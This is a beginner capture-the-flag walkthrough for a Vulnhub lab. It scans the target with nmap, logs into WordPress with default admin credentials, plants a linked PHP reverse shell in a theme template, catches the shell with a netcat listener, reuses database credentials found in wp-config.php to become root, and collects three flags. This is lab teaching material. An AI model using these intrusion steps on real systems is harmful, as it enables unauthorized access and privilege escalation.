Once again we are with the Vulnhub labs
tutorial; this article is related to CTF lab where you will face three
challenges to complete the task. This lab is pretty good for beginner as they
have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a
post exploitation flag on the box. You can download this VM
from here.
Let’s start..
Firstly, scan the target IP with aggressive
scan using Nmap tool as given in the image.
nmap -p- -A 192.168.1.24
With the nmap result you can see that port 22,
53, 80, 110, 139, 143, 445, 993 and 995 are open with the services like SSH,
HTTP and many others.
Since port 80 is working, open the
victim IP 192.168.1.24 in the browser. You can see its
home page in the image below :
Nmap scan also shows that robots.txt. Once
accessed robots.txt it will show you that website is in wordpress, which is
exploitable to in this scenario.
Let’s check out wordpress directory in the
browser once.
Further, when I explored the following path:
192.168.1.24/wordpress/wp-login.php in the browser, I found a WordPress
administrator console.
To breach administrator console of the
WordPress we can use WPScan tool; now type the following command to start
wpscan enumeration.
WPScan’s result
will show two users as you can see in the image below. We will move forward
with admin user.
I used default log in credentials i.e.
admin:admin and therefore I was logged in as Admin. Now, under the console we
can upload any theme, taking advantage of the rights we have obtained, we will
try to upload the malicious script to achieve reverse connection from victim’s
system. The script we will use can be downloaded from : http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Now copy the PHP text from * and paste it as new theme under selected
404.php template.
Now type the following commands to have session
through netcat :
nc –lpv 1234
Once you have the session, use the following commands
to navigate around :
cd /home
ls
In /home I found wpadmin folder which is obviously
important so let’s check it for a flag using following commands :
cd wpadmin
ls
cat flag.txt
This way, in the above image you see that we
have found our first flag.
Another important file in wordpress is Wp-config.php.
Therefore, after exploring this file I
found MYSQL Setting. This contained credentials for root. If you notice the
image below you’ll observe that the username and password i.e. root:
rootpassword
Let’s switch the user to root and then in the root
folder you will find the second flag too. So, use the following commands for the said task :
su
rootpassword!
cd /root
ls
cat flag.txt
Now, we all know that cron.d is an important linux
directory and I just checked it for the sake of it and there I found our last
and third flag. Use the following commands to achieve that :
cd /etc
cd cron.d
ls
cat php5
Ohh-Yah! We have successfully captured all 3 flags. Hence, we have
successfully completed the CTF.
Author: Arpit Pandey is a Certified Ethical
Hacker, Cyber Security Expert, Penetration Tester. Contact here
0 comments:
Post a Comment